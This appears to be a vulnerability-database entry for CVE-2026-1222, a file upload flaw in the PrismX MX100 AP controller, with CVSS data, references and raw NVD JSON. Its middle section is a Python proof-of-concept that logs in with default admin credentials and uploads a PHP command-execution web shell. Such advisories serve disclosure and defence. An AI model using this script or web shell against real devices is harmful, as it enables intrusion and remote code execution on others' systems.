CVE-2026-1222

Description

PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PrismX MX100 AP Controller (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1222 PoC - PrismX MX100 Arbitrary File Upload
# Target: PrismX MX100 AP Controller

TARGET = 'http://target-ip'
USERNAME = 'admin'
PASSWORD = 'admin'

def exploit():
    # Step 1: Login to get session
    session = requests.Session()
    login_data = {
        'username': USERNAME,
        'password': PASSWORD
    }
    
    resp = session.post(f'{TARGET}/login', data=login_data)
    if resp.status_code != 200:
        print('[-] Login failed')
        return
    
    print('[+] Login successful')
    
    # Step 2: Upload malicious PHP webshell
    webshell = "<?php system($_GET['cmd']); ?>"
    files = {
        'file': ('shell.php', webshell, 'application/x-php')
    }
    
    resp = session.post(f'{TARGET}/api/upload', files=files)
    if resp.status_code == 200:
        print('[+] Webshell uploaded successfully')
        print(f'[+] Access at: {TARGET}/uploads/shell.php?cmd=whoami')
    else:
        print('[-] Upload failed')

if __name__ == '__main__':
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1222/
[4] VulDB https://vuldb.com/cve/CVE-2026-1222
[5] https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1222", "sourceIdentifier": "[email protected]", "published": "2026-01-20T07:15:50.290", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}, {"lang": "es", "value": "El controlador AP PrismX MX100 desarrollado por BROWAN COMMUNICATIONS tiene una vulnerabilidad de carga de archivos arbitrarios, permitiendo a atacantes remotos privilegiados cargar y ejecutar puertas traseras web shell, lo que posibilita la ejecución de código arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html", "source": "[email protected]"}]}}